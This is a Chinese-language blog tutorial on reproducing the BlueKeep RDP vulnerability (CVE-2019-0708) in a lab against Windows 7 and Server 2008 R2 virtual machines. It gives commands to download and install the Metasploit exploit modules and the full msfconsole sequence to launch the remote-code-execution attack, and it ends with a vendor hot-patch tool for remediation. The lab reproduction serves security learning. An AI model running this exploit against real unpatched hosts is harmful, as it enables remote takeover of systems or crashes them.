CVE-2019-0708复现教程

0x00 前言

前几天,随着CVE-2019-0708漏洞EXP的现世,顿时让安全圈躁动起来,大家都通过官网的一些文档教程来自己搭建环境复现漏洞,而菜鸡的我,复现了好久,却久久不能复现成功,今天再次复现,发现了问题的所在,再次献上自己的复现教程,虽然网上教程已经泛滥。

0x01 测试环境

攻击机:kali Linux 2019.2

靶机:Windows7 ultimate SP1

Windows server 2008 R2标准版

攻击框架:metasploit

EXP:cve_2019_0708_bluekeep_rce

0x02 相关文件下载

CVE-2019-0708 exp下载地址:传送门

Windows7 ultimate SP1下载地址:

1
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

Windows server 2008 R2标准版下载地址:

1
ed2k://|file|cn_windows_server_2008_r2_hpc_edition_with_service_pack_1_x64_dvd_700632.iso|3071051776|7FDEE0F7A49FC63148D4DE580D803742|/

0x03 开搞

3.1 跟新metasploit框架

首先需要跟新到最新的metasploit框架,版本是5.0.47版本

跟新命令脚本如下

1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

跟新完成的版本截图

跟新后可能会出现如下两个问题

意思是没有启动带数据库支持的MSF服务需要我们去启动,其实这对于复现漏洞没有影响,就是看着难受

【解决方法】

我们使用exit退出msfconsole,然后输入:

1
/etc/init.d/postgresql start

输入完成后等待显示:

这个字样在输入:msfdb init

再次输入msfconsole,问题解决

3.2 替换exp文件

首先需要下载0708的exp文件,这个文件在前面以及分享过了,也可以利用wget命令直接下载

1
2
3
4
5
6
7
wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

然后,进入刚刚下载的exp的目录,然后使用下面命令替换原来的exp

1
2
3
4
5
6
7
8
9
cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

mkdir /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp ##创建rdp目录

cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

3.3 开始复现

3.3.1 Windows 7 x64 sp1配置

第一步:关闭防火墙

1568195617145

第二步:开启3389远程

3.3.2使用的命令

1
2
3
4
5
6
7
8
9
10
msfconsole ##进入metasploit框架
reload_all ##重新载入漏洞模块
search 0708 ##搜索0708的漏洞
use exploit/windows/rdp/cve_2019_0708_bluekeep _rce ##0708RDP攻击模块
info ##查看漏洞的相关信息
show options ##查看需要设置的参数
set rhosts ##靶机ip ##设置需要攻击的靶机ip地址
show targets ##显示可以攻击的靶机类型
set target 数字 ##设置攻击的靶机类型
exploit ##开始利用

msfconsole

reload_all

search 0708

info

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
Name: CVE-2019-0708 BlueKeep RDP Remote Windows Kernel Use After Free
Module: exploit/windows/rdp/cve_2019_0708_bluekeep_rce
Platform: Windows
Arch:
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Manual
Disclosed: 2019-05-14

Provided by:
Sean Dillon <sean.dillon@risksense.com>
Ryan Hanson <dunno@findthisout.com>
OJ Reeves <oj@beyondbinary.io>
Brent Cook <bcook@rapid7.com>

Available targets:
Id Name
-- ----
0 Automatic targeting via fingerprinting
1 Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
2 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox)
3 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare)
4 Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)

Check supported:
Yes

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RDP_CLIENT_IP 192.168.0.100 yes The client IPv4 address to report during connect
RDP_CLIENT_NAME ethdev no The client computer name to report during connect, UNSET = random
RDP_DOMAIN no The client domain name to report during connect
RDP_USER no The username to report during connect, UNSET = random
RHOSTS yes The target address range or CIDR identifier
RPORT 3389 yes The target port (TCP)

Payload information:
Space: 952

Description:
The RDP termdd.sys driver improperly handles binds to internal-only
channel MS_T120, allowing a malformed Disconnect Provider Indication
message to cause use-after-free. With a controllable data/size
remote nonpaged pool spray, an indirect call gadget of the freed
channel is used to achieve arbitrary code execution.

References:
https://cvedetails.com/cve/CVE-2019-0708/
https://github.com/zerosum0x0/CVE-2019-0708

Also known as:
Bluekeep

show options

set rhosts 靶机IP地址

show targets

set target 3

exploit

ps: run和exploit都行

0x04 复现结果

Windows server 2008 R2标准版出现蓝屏

Windows 7 ultimate sp1复现结果

0X05 漏洞检测修复工具&批量快速扫描检测工具&热补丁工具

(来源奇安信公众号)

【下载页面】
https://www.qianxin.com/other/CVE-2019-0708
【使用说明】

1、 下载文件进行解压。
2、 使用win+R快捷键或开始菜单选择“运行”,输入cmd。调起命令行工具。
3、 在命令行工具,执行命令到工具所在文件夹
4、 输入命令对应功能,启用热补丁命令:QKShield.exe /enable ;禁用热补丁命令:QKShield.exe/disable 。
5、 重启系统后,需要重新运行命令行来启用热补丁

【实现效果】
在工具支持的系统中启用热补丁后,用漏洞扫描工具扫描结果为没有漏洞。漏洞扫描工具下载地址:传送门
支持系统:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
Windows XP for 32-bit Systems Service Pack 3
Windows 7 for 32-bit Systems
Windows 7 for x64-based Systems
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2003 for 32-bit Systems Service Pack 2
Windows Server 2003 R2 for 32-bit Systems Service Pack2
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack2
Windows Server 2008 for x64-based Systems Service Pack2 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems ServicePack 1
Windows Server 2008 R2 for x64-based Systems ServicePack 1 (Server Core installation)
暂不支持的系统:
Windows Server 2003 for x64-based Systems Service Pack2
Windows Server 2008 for Itanium-Based Systems ServicePack 2
Windows Server 2008 R2 for Itanium-Based SystemsService Pack 1

0x05 总结

从漏洞刚出来开始,我就开始复现,然后各种安装环境,操作系统,但是都没有复现成功,然后看各种文章,感觉都是那些基本操作,么有什么其他地方,然后我使用Windows 7 X64 ultimate sp1 和Windows server 2008 R2都没有复现成功,弄了两天我放弃了,今天我的一天同事也复现这个漏洞,点出了我的错误所在,原来,我讲set target 3 写成了set targets 3 ,我真是太粗心了,没有注意细节,以为show targets命令是列出可攻击的目标列表,就像当然的认为设置目标是set targets了。。。,然后一直复现不成功

img

最后,自己要记住这个教训,细节注定成败,而我这次败在了细节上,希望自己以后不会忽略这些小细节。共勉 :D

0x06 参考文档

  1. https://blog.csdn.net/weixin_44114370/article/details/89440153
  2. https://mp.weixin.qq.com/s?__biz=MzAxNjQ1NDQ0Mw==&mid=2247483662&idx=1&sn=9927dd8b4df7e710ddc4d8b02f922d8d&chksm=9bf5c74aac824e5cfbde1c6587b6fdb149d464bc822a5b764f25538183e6e64934d549461d5d&mpshare=1&scene=1&srcid=&sharer_sharetime=1567824187733&sharer_shareid=6236dccf93a9257bd8ba451703af334b&key=ee95eb58550bee7fb822e11f9b1822af1833bae210322a6de084b4219a556826d764fbbf32aa5607dc4acf61a722ef8421901382f992c938d121d6226db2bc2b35a9d19b0eec3693f4a44e6b5d0298de&ascene=1&uin=NjA3MTQ5MDY2&devicetype=Windows+10&version=62060841&lang=zh_CN&pass_ticket=5vOsZrZPCHS2PeMt2y%2FquS927zFQZnSX%2FB%2FcGniqOlND7FA0KtfW5jlUG4BlXuNP
  3. https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961
  4. https://github.com/mai-lang-chai/CVE-2019-0708-RCE
  5. https://www.qianxin.com/other/CVE-2019-0708

文章作者: madcoding
文章链接: https://www.mad-coding.cn/2019/09/11/CVE-2019-0708复现教程/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 madcoding’s blog
打赏
  • 微信
  • 支付宝

评论